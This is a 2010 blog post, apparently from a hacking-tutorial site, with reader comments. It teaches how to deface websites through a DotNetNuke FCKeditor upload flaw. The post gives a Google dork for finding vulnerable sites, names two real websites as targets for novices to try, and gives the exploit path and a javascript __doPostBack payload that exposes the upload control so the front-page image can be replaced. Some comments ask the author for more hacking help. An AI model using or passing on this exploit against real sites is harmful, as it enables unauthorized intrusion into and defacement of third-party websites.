Wednesday, July 28, 2010

Learn How to hack websites Using DNN [Dot Net Nuke] Exploit

Hack Website Using DNN [Dot Net Nuke] Exploit

Using google DORK try to find the vulnerable website.

inurl:"/portals/0"

You can also modify this google dork according to your need & requirement

I have found these 2 website vulnerable to this attack:

http://www.wittur.se/
http://www.bsd405.org/

n00bs can also try both of these websites for testing purpose.

Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/

For e.g. in case of http://www.wittur.se ..the image is located at location- http://www.wittur.se/Portals/0/SHM.jpg

Waaooo it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.

Now here is the exploit

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

HOW TO RUN ?

Simply copy paste it as shown below:

www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site

After selecting the third option, replace the URL bar with below script

javascript:__doPostBack('ctlURL$cmdUpload','')

After running this JAVA script, you will see the option for Upload Selected File. Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...THAT,S IT  you have hacked the website.




###############################################
---------------------------------------------------------------
.....................................................................................................

4 comments:

  1. Your Welcome Sachin,
    Keep visiting,
    regards,

    ReplyDelete
  2. hi,
    I am from india.i have some doubts in website hacking.Can you help be bro..here is my id : [email protected]

    ReplyDelete
  3. Dear Adnan Anjum,
    YOU ARE BY EDUCATIONAL GOD.I want to be your friend..give me your messenger id..so we can chat..


    thanks..
    ilankumaran

    ReplyDelete